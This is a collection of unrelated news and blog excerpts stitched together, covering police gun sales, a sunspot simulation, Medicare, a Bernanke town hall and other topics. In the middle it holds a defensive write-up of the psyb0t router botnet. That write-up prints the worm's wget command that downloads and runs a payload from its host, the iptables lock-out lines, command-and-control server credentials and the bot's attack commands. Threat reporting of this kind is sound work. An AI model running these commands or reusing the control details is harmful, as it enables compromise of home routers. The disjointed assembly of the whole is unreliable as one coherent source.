Sevine noted that most weapons used in crimes are not for sale because they are kept as evidence , sometimes for decades .
Sevine stressed that licensed dealers can only sell to people who can legally own firearms .
“ We ’re not selling to any civilian off the streets , ” she said .
“ We ’re very cautious as to how we go about this . ”
Advertisement
The sheriff ’s program , which has netted nearly $ 30,000 in two auctions , is what inspired Small to propose that Colorado Springs police start selling their seized weapons .
He shrugged off complaints about guns possibly ending up on the streets , noting that police have long sold other assets seized from criminals .
“ We auction off cars .
It seems to me there ’s not that much difference between a firearm and a vehicle , ” Small said .
“ We ’ve got a number of homes we ’ve seized .
. . .
We do n’t send a bulldozer over to them . ”
Small said he thinks residents are comfortable with the idea because he ’s gotten only a handful of e-mail complaints .
Colorado Springs , population 375,000 , has always been more cosmopolitan and diverse than stereotypes of the mountainous West .
Advertisement
Yes , the evangelical group Focus on the Family has a sign on the interstate advertising the organization ’s visitors center .
One of the many commercial thoroughfares that wind through the subdivisions is called Corporate Drive .
But the city ’s core is full of vintage clothing shops , music stores and an old - fashioned movie theater that last week was showing “ Food Inc . ”
Nonetheless , several residents were rather blase about the possibility of their police selling guns .
“ If it ’s going to generate money for the Police Department or the city , that ’s a good thing , ” said Joe Nason , 28 , a six - year Army veteran taking a break from working on a construction project downtown .
“ People can get weapons anyway .
I do n’t think [ the sales ] would have an effect on crime or more weapons . ”
Ty Lewis , 43 , a floor installer reclining in square - block Acacia Park , also had no worries .
“ I do n’t think it ’s that much of a risk , ” he said .
“ Criminals are going to get their guns illegally . ”
Advertisement
But Susan Jones , an elementary school teacher , had other ideas .
“ I ’m totally against it , ” she said .
“ I do n’t want to have as many guns out there as there already are . ”
Her husband , David , also a teacher , was pushing a pink stroller holding their 11 - month - old daughter , Katelyn , while their 9 - year - old son , Zach , walked along .
He said he did n’t necessarily have a problem with the idea .
But then he stopped and recalled how , when school districts were in dire need of cash , they allowed in soda and candy vending machines .
Now the nation is in the midst of a child obesity epidemic .
“ It ’s got to be managed right , ” he said , so the police do n’t find themselves having to confiscate the guns another time .
--
Advertisement
nicholas.riccardi@latimes.com
Behold the first complete simulation of a sunspot , the product of a new 76 - teraflop supercomputer that ’s allowed scientists to model the sun ’s magnetic processes in unprecedented detail .
The beautiful virtual sunspot ( see video below ) was built using new observations about the structure of the sun .
It represents an area 31,000 miles by 62,000 miles to a depth of 3,700 miles .
Scientists at the National Center for Atmospheric Research used a wealth of equations that describe the interactions of particles in the environment to calculate the dynamics of the sunspot at 1.8 billion individual points .
“ Advances in supercomputing power are enabling us to close in on some of the most fundamental processes of the sun , ” said Michael Knoelker , director of NCAR ’s High Altitude Observatory and co-author of a paper on the work appearing in Science Thursday .
“ With this breakthrough simulation , an overall comprehensive physical picture is emerging for everything that observers have associated with the appearance , formation , dynamics and the decay of sunspots on the sun ’s surface . ”
Sunspots , which wax and wane in roughly 11 - year cycles , eject massive amounts of plasma into the solar system , sometimes causing disruptions of terrestrial communications and power grid infrastructure .
We ’ve been studying them for a 100 years , but it ’s only recently that keener observations and expanded computing power have enabled us to begin to really understand them .
Still , there is a lot left to learn .
Over the last year , scientists have been trying to explain the abnormally low number of sunspots .
The normal cycle appeared to have been disrupted , which would have required a major rethink of the sun ’s internal dynamics .
This week , though , a team at the National Solar Observatory announced at an American Astronomical Society meeting press conference that they ’d pinpointed the cause : a laggard jet stream .
Sunspots are generated by jet streams that originate at the sun ’s poles every 11 years and migrate down to the latitude of 22 degrees .
Over the past few years , a jet stream moved more slowly towards the equator than previous ones .
Now that it ’s finally in position near 22 degrees , we ’re starting to see increased sunspot activity .
Still , really basic questions remain .
For example , why did the jet stream move more slowly ?
Or even , why do jet streams form at all — and why the seemingly random interval ?
“ We still do n’t understand exactly how jet streams trigger sunspot production , ” said Dean Pesnell of NASA ’s Goddard Space Flight Center .
“ Nor do we fully understand how the jet streams themselves are generated . ”
With the new supercomputer sunspot model , solar researchers could gain a deeper understanding of these powerful , mysterious and important phenomena .
That ’s good news because as sunspot activity kicks back up towards its maximum , experts warn the Earth ’s electrical and communications networks could be in very serious trouble .
“ If you want to understand all the drivers of Earth ’s atmospheric system , you have to understand how sunspots emerge and evolve , ” said Matthias Rempel of NCAR ’s High Altitude Observatory , lead author of the Science paper .
“ Our simulations will advance research into the inner workings of the sun as well as connections between solar output and Earth ’s atmosphere . ”
The video shows the computer simulation of the complex magnetic fields that form sunspots .
The black - and - white images show the sun ’s surface , with black representing negative polarity and white positive polarity .
The color simulation reveals what ’s happening deep in the sun ; the lighter colors in the subsurface simulation indicate greater magnetic field strength .
See Also :
Image and Video : Matthias Rempel , NCAR / UCAR .
WiSci 2.0 : Alexis Madrigal ’s Twitter , Google Reader feed , and book site for The History of Our Future ; Wired Science on Facebook .
High - school students ' performance last year on the SAT college - entrance exam fell slightly , and the score gap generally widened between lower - performing minority groups and white and Asian - American students , raising questions about the effectiveness of national education reform efforts .
Average scores for the class of 2009 in critical reading dropped to 501 from 502 , in writing to 493 from 494 and held steady in math , at 515 .
The combined scores are the lowest this decade and reflect stalled performance over the past three ...
As reported elsewhere the first super easy Padre installer for Windows was released last week .
It is now called the Almost Six package as it contains a development version of Rakudo Perl 6 .
Almost six contains the following packages :
It is very easy to download the msi package and then install it as you would install any other Windows application .
Then you can start writing either Perl 5 or Perl 6 code .
I was on YAPC :: EU in the last 3 days but there almost everyone is using Linux or Mac OSX .
So I wonder what do you people suggest ?
How can we attract Windows users who write Perl code to try Padre an give us feedback ?
Corbis Readymech Paper Pinhole Cameras –
Your next camera does n’t have to cost you an arm and a leg– nor do you have to leave your computer to get your hands on it .
The Corbis Readymech Pinhole Cameras are made entirely of paper– and can be printed from your nearest printer without costing you a dime .
These visually arresting cameras allow a pinhole ’s worth of light to slowly soak your film until you ’ve captured your target .
The resulting images are full of all the lo-fi character and warmth that are lost on today ’s digital cameras .
Want to give the Corbis Readymech a try ?
It ’s simple .
Print out one of the many brilliantly designed camera sets , construct it , buy some cheap film and point that pinhole at something beautiful .
Voila , you ’ve got yourself some lovely photos– and a brand new hobby .
[ download for free at readymech ]
Corbis Readymech Pinhole Camera Gallery
The world record - breaking journey , which had her parents ' approval , would have taken Laura Dekker out of the classroom next week and through some of the world 's most dangerous waters for the next two years .
A week of misfortune turned to disaster for Affliction Entertainment on Friday , as the promotion canceled Affliction “ Trilogy , ” which had been scheduled for Aug. 1 at the Honda Center in Anaheim , Calif .
“ Finding an opponent for the number one - ranked MMA heavyweight champion in such a short period of time was a huge endeavor , and I ’m thrilled at the amount of fighters willing to take on this challenge , ” Affliction Entertainment Vice President Tom Atencio said in a news release .
“ But in the end , we just did n’t have enough time to promote a new fight to our standards .
” SI.com reported the news first Friday morning , and Sherdog.com confirmed shortly after .
The cancellation -- which could spell the end of Affliction 's year - long run as a mixed martial arts promotion -- comes on the heels of heavyweight Josh Barnett 's failed drug test , which forced him out of the “ Trilogy ” main event against Fedor Emelianenko on Wednesday .
Barnett , 32 , tested positive for a banned anabolic steroid and was denied licensure by the California State Athletic Commission .
Promoters scrambled to find a replacement opponent for Emelianenko and reportedly considered middleweight Vitor Belfort , light heavyweight prospect Muhammed Lawal and heavyweights Brett Rogers Jeff Monson and Bobby Lashley Atencio declined to comment further when reached by Sherdog.com .
Alice in Rwandaland and Through the Looking Glass
If you ’re going to talk about humanitarian interventionism ( and with Conor as our guestblogger this week , we are ) , then sooner or later , you are going to come up against the Big One ; the argument that the fact of the Rwandan genocide forever legitimises the general principle of a “ responsibility to protect ” .
A version of this can be seen in James Traub ’s review of “ The Thin Blue Line ( I should note here that IIRC Conor does say in his book that there should have been more of an intervention in Rwanda ) :
In 2005 , the world ’s heads of state , gathered at the U.N. General Assembly , adopted the doctrine of “ the responsibility to protect , ” which stipulates that states have an obligation to protect their citizens from crimes against humanity and other mass atrocities , and that , should they be unable or unwilling to do so , other states incur that obligation .
That responsibility , in the most extreme cases , includes military action .
R2P , as the norm has come to be known , formalizes the principle , which lies at the heart of humanitarian intervention , that the right of people to be free from the worst forms of mistreatment supersedes the right of states to be free from external intervention .
It is scarcely possible in the aftermath of Rwanda to argue otherwise , and so no one does directly .
The implication here is that there was no intervention in Rwanda , and that this was the reason for the genocide ( Traub ’s sentence “ It is scarcely possible … ” summarises the rhetorical strategy with rather more grace and subtlety than is typical – it ’s not particularly uncommon for supporters of intervention to simply accuse opponents of having the blood of Rwanda on their hands ) .
The thing is , there was a military intervention in Rwanda .
It was called “ Operation Turquoise “ , carried out by the French government acting under a UN mandate , aimed at stabilising the recognised government of Rwanda and establishing a “ safe zone ” .
It ’s described in Conor ’s book , and in most histories of the Rwandan genocide .
It ’s not at all an obscure fact about Rwanda that Operation Turquoise happened there .
The reason why humanitarian interventionists do n’t typically mention Turquoise , however , is that it was an unmitigated disaster .
It drew resources away from the existing UN peacekeeping force , it had confused rules of engagement which left it all too often acting as a bodyguard for genocidaires and it withdrew halfway through the genocide , leaving a massive refugee problem .
On the other hand , I do n’t quite understand why this means that advocates of humanitarian intervention get to erase it from the record .
Operation Turquoise was an atrociously planned , wildly under - resourced relative to its aims , and largely politically motivated intervention which had the effect of making things worse .
In other words , it was an utterly typical example of the type .
In Rwanda , there was exactly the kind of humanitarian intervention which it ’s reasonable to expect in any other case .
Which is why I agree with Jim Henley ; Rwanda made me an anti-interventionist .
My point here is that the word “ responsibility ” in “ responsibility to protect ” is weasel .
People who think that the R2P is a good idea tend to assume that “ responsibility ” means “ obligation ” , and that the R2P doctrine places an actual legal obligation on the world ’s democracies to not only carry out an intervention , but also to do so with a full complement of military resources , and without any concern for their own political interests ( the Save Darfur Coalition had a particularly bad case of this ; at times they seemed to literally believe that “ genocide ” was a magical word that would create a fully equipped United Nations army of more than 50,000 strong , complete with helicopters and trucks , as if they ’d been sown from dragons ’ teeth ) .
It ’s clear that no state in the world would ever really find it possible to accept such an open - ended commitment on the part of its limited military capacity , from a simple economic point of view notwithstanding the politics .
And so “ responsibility to protect ” in practice is going to mean “ option to protect ” ; the R2P doctrine provides a pretext for larger powers to carry out military interventions as and when they want one and without too much consideration for the consequences , so long as they can come up with a suitable ex ante humanitarian rationale .
Basically what I ’m saying here is that if you want to create a legal space for humanitarian interventions , then you need some means of ensuring that we get only good humanitarian interventions , which do the job they ’re intended for .
Otherwise you ’re going to get a lot of Operation Turquoises , and very few … well , can someone give me an example of a humanitarian intervention which did actually work ?
When I was a young lad , eating out was something of a luxury for my family .
Most of our meals , at least 95 % , were prepared and eaten at home .
This was the model for most people my age or older .
But these days , society has migrated to eating out of the home way more often .
The result is that we ’re spending a lot more on food than we used to .
So , are there ways to chop the bill and eat out for less ?
You bet .
1 . Share your soft drink
Most of the time , my wife and I find that one drink is adequate for both of us .
But in this day and age of countless free refills , we will never run short of our soft drink anyway .
It ’s not much , but a couple of bucks saved every time you order a drink at a restaurant or fast food place really adds up .
And that goes for the kids ’ drinks , too .
My kids are quite happy to share a juice box or fountain drink .
Oh , and before anyone cries for the poor fast food joints or restaurant chains , it ’s worth noting that the average fountain drink costs the restaurant around 20 cents and they charge you around 10 times that for the beverage .
So , I ’m not losing any sleep over it ; they ’re still making an insane profit from any drinks we order .
2 . Do n’t be shy — use coupons
I see people hand over coupons at the grocery store all the time , but in fast food places it happens less ; and in restaurants , it ’s even more rare .
There seems to be a taboo about coupons in restaurants , maybe because people feel like they ’re picking the pockets of the waiter who is looking them right in the face .
As several commenters have pointed out , your waiter will gladly accept coupons as long as you remember to tip the waiter based on the price of the bill BEFORE the coupon was deducted .
That way , you get the saving , the waiter gets the same tips , and only the restaurant chain itself is out of pocket .
But as the coupon enticed you in , the loss of revenue is worth it for the extra custom .
Therefore , bring on the coupons , hand them over proudly and enjoy your free grub .
3 . Be wary of the advice from your waiter
When we go into a restaurant we ’re unfamiliar with , we will often ask our waiter “ so what do you like ? ” or “ what do you recommend ? ”
Unsurprisingly , our helpful waiter usually picks from the more expensive end of the menu .
Rarely do we hear “ go for the burger ” if there ’s a filet mignon for four times the price .
The more expensive items mean a larger bill , which equates to a larger tip .
It may well be a great meal , but it may also stretch your budget ; so , load the question with something more useful , like “ what do you recommend in the $ 8 - $ 10 range ? ”
4 . Order apps as main courses
Appetizers are supposed to whet your appetite for the main meal .
Have you seen appetizers these day though ?
They ’re just as big as the main meal !
I ordered potato skins a few months ago and could hardly finish half of my main course .
So , although they ’re cheaper and labeled as appetizers , there ’s no reason not to order them as a main course .
5. Split a meal
Many restaurants these days go way overboard on portions .
A restaurant I go to occasionally called Claim Jumper serves half and full portions .
They recommend the half portions unless you ’re insanely hungry .
So , as the full portion is only a few bucks more , it ’s well worth asking for that and an extra plate .
You can also split the rest of the food , including salads and dessert , and will no doubt be surprised at how satisfied you are with the amount of food you got to eat .
Half portions these days are like whole portions from the fifties .
6 . Take advantage of your birthday
Hey , it only comes around once a year ( unless you ’re the Queen of England ) so make full use of the special offers handed out by restaurants and fast food joints .
A few near me give you a free entrée on your birthday .
Others do a BOGO , and some offer free drinks or desserts .
And remember , that infamous fake birthday song that most places sing to the guest of honor , well , that comes with a free cake or free ice - cream .
Sure , you have to endure 30 seconds of embarrassment , but for free dessert ?
Go for it .
7 . Get the salad bar three - course meal
These days , salad bars are becoming the norm in many restaurants .
They ’re easy to stock , they ’re self - serve and most people do n’t take full advantage of them .
But you really can just order the salad bar and do very well for yourself .
Start with salad and bread , move on to the pasta dishes and finish with fruit , cheeses , pudding or anything else that ’s on offer .
At about $ 8 - $ 9 , it ’s not a lot to pay for a healthy three - course meal .
8 . And then there ’s the buffet …
Whether you love Indian food , Mexican , Chinese or traditional meat ‘ n ’ potatoes grub , buffets are a great way to feed your whole family for around $ 20 - $ 30 .
Now , buffets get a lot of criticism because the food is not always the best quality and the atmosphere is hardly conducive to a wonderful evening out .
But this is budget dining , and if you choose good foods ( vegetables , fresh fruit , salads , pastas , the grill and so on ) you can have a great meal for peanuts .
Usually , kids get in for free or a few bucks per head .
Our local Country Buffet has been packed out every time we visited recently .
In tough times , the buffets get the customers .
9 . Doggie bags rule
If you ’re not into the idea of splitting a meal with someone else ( or you ’re eating alone ) then split the meal with yourself .
As I ’ve mentioned earlier , portion sizes are huge these days , so eat half of your meal and ask for a box for the rest .
This splits the cost of your meal in two , and dinner has already been made for you for the following day .
10 .
Look for half - off gift certificates
My favorite site by far for this is halfoffdeals.com .
You can buy gift certificates to over 41,000 restaurants for around 50 % of their face value .
You can search by zip code or city , and there ’s even an email alert system to tell you when new deals go live .
Most certificates do come with restrictions , which is why you get such a great deal .
A common one is that you do n’t get any cash back from your certificate , if there ’s any left .
But if you pay $ 15 for a $ 25 , do you care about the extra $ 5 anyway ?
And remember , you can always order something to take home .
Teenager Graham Merrington got his foot trapped in tarmac which had melted in the heat .
Firefighters freed him after his foot sank through the road surface near his home in Burnage , Manchester , and he got stuck in a 12 inch hole
Credit : MANCHESTER EVENING NEWS
Player goes here .
If you can read this , try reloading the page .
The Pharaoh of Pop does n’t quite have the same ring to it as King of Pop , but visitors to Chicago ’s Field Museum could swear that ’s Jacko ’s face on a 3,000 - year - old Egyptian bust .
The spitting image limestone sculpture has been on display at the museum since 1988 , but recently started drawing attention because of its likeness to Jacko --- complete with disfigured nose .
Unfortunately the bust , which was carved sometime between 1550 B.C. and 1050 B.C. , is of a woman and MJ likely never had the chance to see the statuette .
Michael Sneed .
“ But the similarity between the limestone statue of a woman – which is about 3,000 years old --- and Jackson is astounding . ”
“ I have no idea whether Jackson ever visited the museum , ” a Field spokesperson said to the Sun - Times .
“ But the similarity between the limestone statue of a woman – which is about 3,000 years old --- and Jackson is astounding . ”
Below is a description of a botnet we found in the wild .
However ,
Update 4 --
Before you read anything else , read this
Am I Vulnerable ?
You are only vulnerable if :
Your device is a mipsel ( MIPS running in little - endian mode , this is what the worm is compiled for ) device .
Your device also has telnet , SSH or web - based interfaces available to the WAN , and
Your username and password combinations are weak , OR the daemons that your firmware uses are exploitable .
As such , 90 % of the routers and modems participating in this botnet are participating due to user - error ( the user themselves or otherwise ) .
Unfortunately , it seems that some of the people covering this botnet do not understand this point , and it is making us look like a bunch of idiots .
Any device that meets the above criteria is vulnerable , including those built on custom firmware such as OpenWRT and DD - WRT .
If the above criteria is not met , then the device is NOT vulnerable .
How can I tell if I have been infected ?
Ports 22 , 23 and 80 are blocked as part of the infection process ( but NOT as part of the rootkit itself , running the rootkit itself will not alter your iptables configuration ) .
If these ports are blocked , you should perform a hard reset on your device , change the administrative passwords , and update to the latest firmware .
These steps will remove the rootkit and ensure that your device is not reinfected .
Public Relations and Us
We deal with botnets and abusive hosts , not PR .
We are quite concerned that not many people have ( there have been a few , but the majority of the people have used the ' slashdot version ' ) contacted us , or anybody else working on this for further information or to verify if their conclusions written in their articles were correct .
Many articles described this as a " end of the world , all routers are vulnerable " thing .
This is simply not the case .
We would prefer if you contact us if you do not understand fully now .
Commentary found on the Internet about " this rootkit is fake " , or " it does n't run on my ubuntu box " , or " UPX does n't unpack it "
Ok , first off , this binary is for MIPS - based processors , which are not X86 ( the kind used in the average PC ) .
Secondly , this binary IS packed with UPX , but he has stripped the headers necessary to decompress it .
A little time with a hex editor can get you the decompressed binary , as can just running it in qemu .
Commentary on " why isnt Law Enforcement involved "
Many botnet investigations are handled by the private sector .
This is one of those investigations .
If a Law Enforcement agency is interested in our work , or the work of anybody else researching this worm , then they should be encouraged to email admins@dronebl.org about it .
If we have any useful information they do n't already know , we will be more than happy to provide it .
Commentary on " is device X vulnerable ? "
Short answer :
We do n't know .
There are so many devices out there that we could not possibly know .
Your best bet would be to take action to upgrade the device firmware and secure any passwords if there is concern that the device may be vulnerable .
Such actions will help to avoid exploitation by the worm .
The worm info itself
We have come across a botnet worm spreading around called " psyb0t " .
It is notable because , according to my knowledge , it :
is the first botnet worm to target routers and DSL modems
contains shellcode for many mipsel devices
is not targeting PCs or servers
uses multiple strategies for exploitation , including bruteforce username and password combinations
harvests usernames and passwords through deep packet inspection
can scan for exploitable phpMyAdmin and MySQL servers
Vulnerable devices
any linux mipsel routing device that has the router administration interface or sshd or telnetd in a DMZ , which has weak username / passwords ( including openwrt / dd - wrt devices ) .
possibly others
Infection strategy
Get a shell on the vulnerable device ( methods vary ) .
Once a shell is acquired , the bot does the following things :
# rm -f /var/tmp/udhcpc.env
# wget
If wget is present , then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background .
If wget is not present , the bot looks for " busybox ftpget " , and then tries falling back to a tftp client .
Once it is downloaded , it launches it in the background .
The following snippet is the variant it uses if it finds that wget is usable .
# wget hxxp://dweb.webhop.net/.bb/udhcpc.env
-P /var / tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env
&
udhcpc.env 100 % |*****************************|
33744 00:00 ETA
It then takes several steps to lock anybody out of the device , including blocking telnet , sshd and web ports .
# iptables -A INPUT - p tcp -- dport 23 -j DROP
# iptables -A INPUT - p tcp -- dport 22 -j DROP
# iptables -A INPUT - p tcp -- dport 80 -j DROP
This concludes the infection process .
IRC Botnet
Command and control server : strcpy.us.to
IP : 207.155.1.5 ( master controller , Windstream Communications AS16687 )
IP : 202.67.218.33 ( backup controller ?
HKnet / REACH AS ?????)
Port : 5050
Password : $!0@
Channel : #mipsel
Key : %#8b
NickPattern : [ NIP ] -[ A - Z/0-9]
{9}
BotController : DRS
DroneURL : hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env
( backup copy , i did not write it )
strcpy.us.to control domain nameservers : ns1.afraid.org , ns2.afraid.org , ns3.afraid.org , ns4.afraid.org [ suspended ]
IRC Commands
. mode < channel > < modes > - sets a mode on a channel
.login < password > - login to the bot
.logout - logout
. exit - causes the botnet to exit and remove itself
.sh < command > - runs < command > on shell
. tlist - lists all threads
. kill - kills a thread
. killall < pattern > - kills threads by glob - match pattern
. silent - makes the bot stop sending to channel
. getip - show bot WAN ip address
.visit < url > - flood URL with GET requests
. scan - scans a random range for vulnerable routers / modems
.rscan < range > - scans a CIDR range for vulnerable routers / modems
.lscan - scans the local subnet for vulnerable routers / modems
. lrscan - scans a range in the local subnet for vulnerable routers / modems
. split < threadid > - splits the workload of a scan thread into two threads
.sql < range > < url > - scans for vulnerable MySQL servers and attempts to make them download and run URL
.pma < range > < url > - scans for vulnerable phpMyAdmin and attempts to make them download and run URL
. sleep < secs > - makes the bot sleep for the given time
.sel - ???
.esel - skip next part if locale is not X
.vsel - skip next part if version is not X
.gsel - ???
. rejoin [ delay ] - cycle the channel after delay
.upgrade - download new bot from the distribution site
.ver - returns " [ PRIVATE ] PSYB0T " followed by version
.rs - returns detected rapidshare URLs and logins
.rsgen - generate a bogus rapidshare login page and force user to browse to it
.rsloop < port > - runs a webserver i/o loop on < port > as a thread
. wget < url > - runs wget with the provided url
. r00t - attempts to raise effective UID using vmsplice ( ) exploit ( seems pointless )
.sflood < ip > < count > - sends SYN packets to IP
.uflood < ip > < count > - sends UDP packets to IP
.iflood < ip > < count > - sends ICMP pings to IP
.pscan < ip > - portscans IP
. fscan < ip > - tries to bruteforce FTP server at IP
Commentary
As stated above , this is the first known botnet based on exploiting consumer network devices , such as home routers and cable / dsl modems .
Many devices appear to be vulnerable .
The size of this botnet so far can not be determined .
The author of this worm has some sophisticated programming knowledge , given the nature of this executable .
Action must be taken immediately to stop this worm before it grows much larger .
We came across this botnet as part of an investigation into the DDoS attacks against DroneBL 's infrastructure two weeks ago , and feel that this botnet was the one which flooded DroneBL .
We are looking into finding out more information about this botnet , and its controller .
If you have any information , we would like to know .
If you intend to disassemble this botnet , you should note it 's UPX - compressed .
I estimate that at the time of writing , there is at least 100,000 hosts infected .
I suspect that the .sql and .pma exploit tools are used for finding more controllers .
But I do not have the controller payload .
This technique is one to be extremely concerned about because most end users will not know their network has been hacked , or that their router is exploited .
This means that in the future , this could be an attack vector for the theft of personally identifying information .
This technique will certainly not be going away .
Update
Some prior research about an earlier version has been found here .
This research was done by Terry Baume .
Update 2
This botnet has apparently been shutdown :
* Now talking on #mipsel
* Topic for #mipsel is : .silent on .killall .exit ._exit_ .
Research is over :
for those interested i reached 80 K .
That was fun :) , time to get back to the real life ...
( To the DroneBL guys :
I never DDOSed / Phished anybody or peeked on anybody 's private data for that matter )
* Topic for #mipsel set by DRS at Sun Mar 22 17:02:15 2009
While this information may or may not be true , we have received HTTP - based floods from IPs participating in this botnet .
We are still interested in this DRS person .
If you have any information , please provide it to DroneBL .
We will not disclose our sources .
We also hope that the router and modem manufacturers which have been monitoring this incident take note of it and secure their firmware from future attacks .
Update 3 ( Disinfection Instructions )
We have been getting asked a lot about disinfection instructions .
To disinfect , simply powercycle your device and take appropriate action to lock it down , including the latest firmware updates , and using a secure password .
﻿
It did n't take chaotic town - hall meetings , raging demonstrators and consequent brooding in various sectors of the media to bring home the truth that the campaign for a health - care bill is , to put it mildly , not going awfully well .
It 's not hard now to envision the state of this crusade with just a month or two more of diligent management by the Obama team — think train wreck .
It may one day be otherwise in the more perfect world of universal coverage , but for now disabilities like the tone deafness that afflicts this administration from the top down are uninsurable .
...
It is a truth universally acknowledged that a bored and curious writer will occasionally plug her own name into the Amazon.com search engine .
If Jane Austen were around , and decided to try this on a solitary afternoon , she might find the results excessively diverting .
( Full article : 712 words )
This article is available in our archives : Globe Subscribers FREE for subscribers Subscribers to the Boston Globe get unlimited access to our archives .
Not a subscriber ?
Non-Subscribers Purchase an electronic copy of the full article .
Learn More $ 9.95 1 month archives pass
1 month archives pass $ 24.95 3 months archives pass
3 months archives pass $ 74.95 1 year archives pass
There is no question older Americans are worried that any health care overhaul may cut end up cutting their benefits , even if the worst of those fears are being stoked by misinformation .
What may be more puzzling is how much confusion there is among Medicare recipients about what the program is — as evident in the variants of “ Keep government out of Medicare ! ” that have been shouted at town hall meetings .
Perhaps the outbursts should not have come as a surprise .
In 2003 , the Kaiser Family Foundation and Harvard School of Public Health conducted a nationwide poll in which more than 1,400 adults , including 441 persons 65 and older , were asked , “ To the best of your knowledge , is Medicare primarily a federal government program , a state government program or a private insurance program ? ”
The majority of seniors — 78 percent — identified Medicare as a federal program .
The rest were uncertain , or thought the coverage was provided by private insurance or their states .
How can so many fail to understand that Medicare is a federal program ?
Experts cite several reasons .
First , seniors do n’t get all their coverage for free ; they are paying into the system .
They have to pay 25 percent of the premium for Medicare Part B , which covers doctor bills and outpatient procedures .
These payments are deducted automatically from Social Security checks .
Perhaps more confusing , seniors make other payments directly to insurance companies .
Prescription drug coverage , known as Medicare Part D , is administered by private insurers ( though three - quarters of the cost is borne by the government ) .
Many recipients also turn to insurance companies for so - called Medigap policies to cover things like deductibles that Medicare wo n’t pay for .
In those cases , part of the patchwork of coverage really is private .
In other ways , too , Medicare can feel like a private program .
Enrollees choose their doctors , present their Medicare cards and let their physicians ’ offices handle the paperwork .
But they can still receive bills for uncovered fees from the doctors .
“ The perception is that it ’s between the doctor , the lab and the patient , ” said Dr. Cheryl Phillips , president of the American Geriatrics Society .
“ It feels like a private choice versus something that ’s externally reviewed .
Most people are kept separate from how coverage and payment decisions are made . ”
And when statements of Medicare benefits do arrive , they resemble traditional insurance statements .
They note the dates of service , services provided , the amount charged , any deductibles , the portion that ’s not covered and the all - important amount “ you may be billed . ”
Granted , the notices are printed on C.M.S. letterhead .
But how many people know what C.M.S. stands for ?
( For the very observant or those with magnifying glasses or youthful eyes , the answer sits on the page in minuscule type — the federal Centers for Medicare & Medicaid Services . )
Finally , about 20 percent of seniors actually do belong to private plans .
These so - called Medicare Advantage plans cost more than traditional Medicare plans , and in many of these plans , enrollees must pay premiums directly to insurance companies .
True , they are heavily subsidized by the government .
But that may not be evident to seniors whose primary contact with the system is through a private insurer .
A pattern of confusion regarding government - run health programs is not atypical , said Susan Dentzer , editor - in - chief of the journal Health Affairs , in an e-mail interview .
“ A lot of people who are on Medicaid , or whose kids are on SChip , are actually enrolled with private managed care organizations that have contracts with states to provide and manage Medicaid or SChip benefits , ” she said .
( SChip , pronounced ESS - chip , is short for State Children ’s Health Insurance Program . )
“ When the Census Bureau does its annual surveys asking what type of coverage people have , some of these people say they have private coverage , when in fact they do n’t , ” she added .
“ It ’s one of the reasons why the Census Bureau survey is thought to undercount the actual number of people on Medicaid . ”
WASHINGTON ( MarketWatch ) -- Federal Reserve Board Chairman Ben Bernanke discussed the economy with average Americans on Sunday , saying the current financial crisis could be even more virulent than the Great Depression .
" A lot of things happened , a lot came together , [ and ] created probably the worst financial crisis , certainly since the Great Depression and possibly even including the Great Depression , " Bernanke said at the start of a town - hall meeting in Kansas City .
Bernanke defended the Fed 's extraordinary moves , which have included slashing interest rates to zero , pumping billions of dollars to keep credit markets open , and buying Treasurys and mortgage debt to keep long - term interest rates low .
" I was not going to be the Federal Reserve chairman who presided over the second Great Depression , " he said .
The event is being televised over three nights , beginning Monday , by U.S. public television network PBS .
Members of the public , screened by PBS , were able to ask questions .
Many questioners expressed unhappiness with the " too big to fail " doctrine .
One asked when Bernanke would get around to firing the leadership of banks that had to accept government assistance .
Another participant said the only thing that was clear to him in the whole crisis was that his small business was " too small to save . "
At first , Bernanke tried to argue that the Fed moved to save big banks to protect the global economy , but by the end , Bernanke simply agreed that " too - big - to - fail has got to go . "
First - of - its - kind meeting
The dialogue marked the first time that a sitting Fed chairman has sat down to answer questions on the record from the public .
For the first 80 years of its existence , Fed officials operated under the rule that the less said , the better .
But recent economic research has indicated that Fed interest - rate policy actually works better if the public understands its basic thrust .
This has led the Fed , in fits and starts , to try to open up .
The results at the town hall meeting were choppy at times , although Bernanke seemed to get better as the event went along .
The first questioner admitted she did n't " have a clue " what the Fed did .
It is doubtful that Bernanke 's laundry list response -- the Fed is monetary policy maker , bank supervisor , crisis manager and consumer protector -- helped her very much .
Asked when " this [ recession ] is going to end , " Bernanke said growth would return in the second half of 2009 , likely at a 1 % pace .
The unemployment rate wo n't peak until next year , he said .
The Fed has put the " pedal to the metal " to try to get the economy growing at a faster pace .
Maybe because his earlier answers were on the scary side , Bernanke then tried to be a cheerleader , saying that the U.S. economy " could n't be held down " and would eventually return to a strong growth pace .
Strong - dollar booster
One odd moment came when Bernanke said he was a supporter of the Obama administration 's " strong dollar " policy .
Fed officials typically steer clear of commenting on currency issues .
" We think the dollar should be strong , and the best way we think to get a strong dollar is to have a strong economy , " Bernanke said .
" Our whole strategy right now is to get the economy out of doldrums and back onto a growth path that will attract foreign funds and keep [ the dollar ] strong , " Bernanke said .
When asked about Bernanke , top Fed officials often use the word " decent " to describe him .
This trait seemed to shine through and by the end of the event , at which point Bernanke was evoking gentle laughter from the audience .
Asked about the stock market , Bernanke said he was worried about getting sued for malpractice .
Bernanke has some other " never done before by Fed chairman " events under his belt .
Earlier this year , he spoke at the National Press Club and took questions from the audience .
And he took an interview for the CBS news program " 60 Minutes , " which included a walk down Main Street in Dillon , South Carolina , his hometown .
Bernanke did try to connect with the audience .
When one member of the audience said he had been laid off and then found work , Bernanke stopped and congratulated him .
Asked what keeps him up at night , Bernanke explained he would probably get a good sleep tonight , saying : " I 'm pretty tired . "
In the latest example of finding media innovation where you 'd least expect it , CBS is embedding a video player in a print ad in Entertainment Weekly that will serve up a buffet of its fall TV lineup .
The CBS foray into a print - digital alliance plays full - motion video at a crisp resolution .
The ad , dubbed by CBS and partner Pepsi Max " the first - ever VIP ( video - in - print ) promotion , " works like one of those audio greeting cards .
Opening the page activates the player , which is a quarter - inch–thick screen seen through a cutaway between two pages concealing the larger circuit board underneath .
The audio quality is equally good ( extremely poor video shot by this reporter notwithstanding ) , but beware :
There are no volume controls , and in a quiet environment , it 's quite loud .
This is surely a intentional design feature , aimed at getting the attention of people nearby .
Unlike the wholly unsatisfying debut of the e-ink cover in Esquire magazine last year , this works .
The video - enhancement will appear in the September issue of Entertainment Weekly , but only in what sounds like a relatively small subset of the circulation :
